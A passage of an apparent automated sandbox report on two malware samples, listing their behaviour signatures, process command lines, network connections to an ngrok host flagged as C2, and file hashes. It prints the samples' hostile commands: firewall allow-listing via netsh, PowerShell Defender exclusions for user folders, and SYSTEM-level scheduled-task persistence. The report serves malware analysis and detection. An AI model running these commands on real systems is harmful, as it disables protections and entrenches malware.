memory/2872-23-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-24-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-25-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-26-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-27-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-28-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-29-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-30-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-31-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-32-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2872-33-0x0000000000400000-0x0000000000D41000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:14
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
157s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a568f22004828c8dc2e3e31c3a8f49a89b164e1eb268f57c93430b20368cfe3b.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Checker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Checker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a568f22004828c8dc2e3e31c3a8f49a89b164e1eb268f57c93430b20368cfe3b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Checker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Checker.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a568f22004828c8dc2e3e31c3a8f49a89b164e1eb268f57c93430b20368cfe3b.exe
"C:\Users\Admin\AppData\Local\Temp\a568f22004828c8dc2e3e31c3a8f49a89b164e1eb268f57c93430b20368cfe3b.exe"
C:\Users\Admin\AppData\Local\Temp\Checker.exe
"C:\Users\Admin\AppData\Local\Temp\Checker.exe"
C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe
"C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c pause
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe" "SA_Checker.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Checker.exe
| MD5 | 970dbe61f878ffef5c98df482a33b93a |
| SHA1 | 2f8e4f7dd06cc67da661f7a33e6a6f79182bc957 |
| SHA256 | bda3eaba6bd0015d68a261b9f8afd2431f702524b7a333fca3b3514058aaff48 |
| SHA512 | f1c9b203e1770e3327217998b4a002a3494e61b8883b2ad4cb6439d3105b65c8cf807d77c029331b678df15dfc89bdff52bd93124b78c67d6f342fc48e2c8621 |
C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe
| MD5 | 88949354d6430e1c6fd4ee0e0d987070 |
| SHA1 | 10d1014f00cd173449f1d3ea2b698a5443688584 |
| SHA256 | d08373a237b6f58a7b1215926fac0faefcdddbf7967b4226f84cbdb275a261f0 |
| SHA512 | 8a18883b2f89bc87449d9fde1ef835fba2186c494ffa3b2adcded7b86103ddd0154856dd5fa9b2e565b6bedd50b80975a8a07ac56560bc725c84c5d7d90abe29 |
memory/5016-17-0x0000000074FD2000-0x0000000074FD3000-memory.dmp
memory/5016-19-0x0000000074FD0000-0x0000000075581000-memory.dmp
memory/5016-20-0x0000000074FD0000-0x0000000075581000-memory.dmp
memory/5016-22-0x0000000074FD2000-0x0000000074FD3000-memory.dmp
memory/5016-23-0x0000000074FD0000-0x0000000075581000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20240708-en
Max time kernel
150s
Max time network
120s
Command Line
Signatures
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\svchost.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Services32.exe | N/A |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\services32.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Services32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Services32.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\resources\svchost.exe | \??\c:\windows\resources\spoolsv.exe | N/A |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\Services32.exe | N/A |
| File opened for modification | C:\Windows\Resources\tjud.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| File opened for modification | \??\c:\windows\resources\themes\explorer.exe | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| File opened for modification | \??\c:\windows\resources\spoolsv.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Services32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\themes\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe
"C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe"
\??\c:\users\admin\appdata\local\temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe
c:\users\admin\appdata\local\temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 02:13 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' /RU "SYSTEM" & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' /RU "SYSTEM"
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Users\Admin\AppData\Local\Temp\Services32.exe
"C:\Users\Admin\AppData\Local\Temp\Services32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry'
\??\c:\users\admin\appdata\local\temp\services32.exe
c:\users\admin\appdata\local\temp\services32.exe
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 02:14 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' /RU "SYSTEM" & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 02:15 /f
Network
Files
memory/2668-0-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe
| MD5 | 5552f88a40afa2e2fef5acbd590ac812 |
| SHA1 | 5afef5451811830c1ec3108cd7ee66a0418a6186 |
| SHA256 | 9a05d71fc8bbbf8beaa8f993cb0d75cbab06ac4c9bf20fe843cfa034dd56a47f |
| SHA512 | 6de5db9d4decc44d4dba8b9097b93664d4942f9753ae6c3fd0e92496677ac93f4c37c0ceb8a07cf1b0fbe777f78eedc522b256be14e1cedfa5c3ef2da5fabbde |
memory/2808-10-0x000007FEF63D3000-0x000007FEF63D4000-memory.dmp
memory/2808-11-0x000000013F130000-0x000000013F146000-memory.dmp
memory/2924-16-0x000007FEF30CE000-0x000007FEF30CF000-memory.dmp
memory/2924-17-0x000000001B620000-0x000000001B902000-memory.dmp
memory/2924-18-0x0000000002820000-0x0000000002828000-memory.dmp
memory/2924-19-0x000007FEF2E10000-0x000007FEF37AD000-memory.dmp
memory/2924-20-0x000007FEF2E10000-0x000007FEF37AD000-memory.dmp
memory/2924-21-0x000007FEF2E10000-0x000007FEF37AD000-memory.dmp
memory/2924-23-0x000007FEF2E10000-0x000007FEF37AD000-memory.dmp
memory/2924-22-0x0000000002CFB000-0x0000000002D62000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OCQ0XGE4U0GAXOFME0K7.temp
| MD5 | c9fc9b8ad7cbd3d6765983fed3ca979e |
| SHA1 | 602999306536161e23557f60fe7159c6349899af |
| SHA256 | fb93d087e73a5d78dcee136c511dae3ab95455dfe975469d5a4f21960f64f7e8 |
| SHA512 | ab1e335c24e1f2ee34cac0009dc66ec2e913bbb4be8afb13069e50dcc7ac63a4add49ba2330b6aa0960b725c32f54af6400bd8a696a0ce10607b0dbdfea129ae |
memory/2612-29-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2612-30-0x0000000002040000-0x0000000002048000-memory.dmp
memory/2808-41-0x000007FEF63D3000-0x000007FEF63D4000-memory.dmp
\Windows\Resources\Themes\icsys.icn.exe
| MD5 | f2667d617c1c5156004ea365bc759c1c |
| SHA1 | 10592eb1cd290802867f1fa13470717fa5643f59 |
| SHA256 | e3aa603a42d20ba4f19f75839e090440cf224410b4bfd60f3aa9b95009a88792 |
| SHA512 | 1cf3faf90dfd6a0834d4d20a825def7c259955ca9b6680fc0a4ff4584e890071655c1a3ed04785cebda52fdb1e6df5f836d4b8d3e4f6c95b5553fe30123ba803 |
C:\Windows\Resources\Themes\explorer.exe
| MD5 | 88d608afd994ac6b1ef1fb128280d62f |
| SHA1 | cd820e32effa4c9cae8d1aec8c1c00b5ae316dbf |
| SHA256 | fffed627f82f4009c36b0f4d277c8385bfbaac3b6c0dadca0fab55279a57d097 |
| SHA512 | 6e5f0677c4b5c12db9b47b21f43f7600ff2502a81c0c90444d8cc595523d7616047aa90f194be9a96f4b40d9cd417265186e8d3680f016855a3ac5ef53dccf60 |
memory/2948-54-0x0000000001BB0000-0x0000000001BCF000-memory.dmp
\Windows\Resources\spoolsv.exe
| MD5 | fa5faa5ab9e8e27cbfb899a1223934c8 |
| SHA1 | 26580034b2869e2b50c9acb39cc8d47a7a384334 |
| SHA256 | c85d27c446c4bf168df517ab33c403cac711611d3d3f4b3ee081e83a3e4789e0 |
| SHA512 | f11d0d00f1ddf585da36ee0aa96dba4184a80da77b77e62fab3527adb46afe7fd0f3bfabbd01f0d15fdeecb9515e70e61cba3c134f07db708ddbf1b8324c961b |
\Windows\Resources\svchost.exe
| MD5 | bb2dfd78321279954fc9d98ca671c38b |
| SHA1 | 9d4e55c1813bf546dc62da1e0cc8234a79181dc8 |
| SHA256 | 8c5d25bb1645b4fd8c33c679036ad74c78dd91695a357149387f32ae65cb3ecc |
| SHA512 | 45805a142618b5907b439cd8d92f2e9ffeb40821acff97be5d79d7ba2026076558b7f89b1322bc69851a355cd4f2f41e0f94e146eb32f3235732c44fe42ef25f |
memory/2188-75-0x0000000000460000-0x000000000047F000-memory.dmp
memory/2628-87-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2188-88-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2668-90-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2948-89-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2808-91-0x0000000000760000-0x000000000076C000-memory.dmp
\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
| MD5 | d1f4a92a1672d7d22a90e2567523d03e |
| SHA1 | a1683621e2103e1df1ce22def923e4ef62ddcd11 |
| SHA256 | 48fd7864ad054ee98f30a32006af85dce9f47cc5fccf065e7da41624cf14f94b |
| SHA512 | 2e6e4dd8ed996ca9c95e7bf225f5b7b567f2a99ae13f637f23b2c959857f9e5ba5833e279b901c0a215cf5692dc6f3e28c47106cd386756e51f5f6f1298f247a |
memory/1092-99-0x000000013FFC0000-0x000000013FFC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Services32.exe
| MD5 | 70c771952bc897446d3ddad90541a1e6 |
| SHA1 | b00b50a893e4552651c4a5c38cf4bb9aed7a101e |
| SHA256 | aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337 |
| SHA512 | 33d402397289c1a828079dfdaaf3966c4b9720ffb070eeba0d5c23f4a3c6c448e4a3fd3cba2f82c712252ce03d726daabd2c66e97f950a122ffb3d5799bae56d |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1644-114-0x000000013F2C0000-0x000000013F2D6000-memory.dmp
memory/1736-121-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/316-171-0x0000000000400000-0x000000000041F000-memory.dmp
memory/568-173-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2596-172-0x0000000000400000-0x000000000041F000-memory.dmp
memory/1092-174-0x0000000000140000-0x0000000000146000-memory.dmp
memory/1472-175-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2648-176-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2648-177-0x0000000001BA0000-0x0000000001BBF000-memory.dmp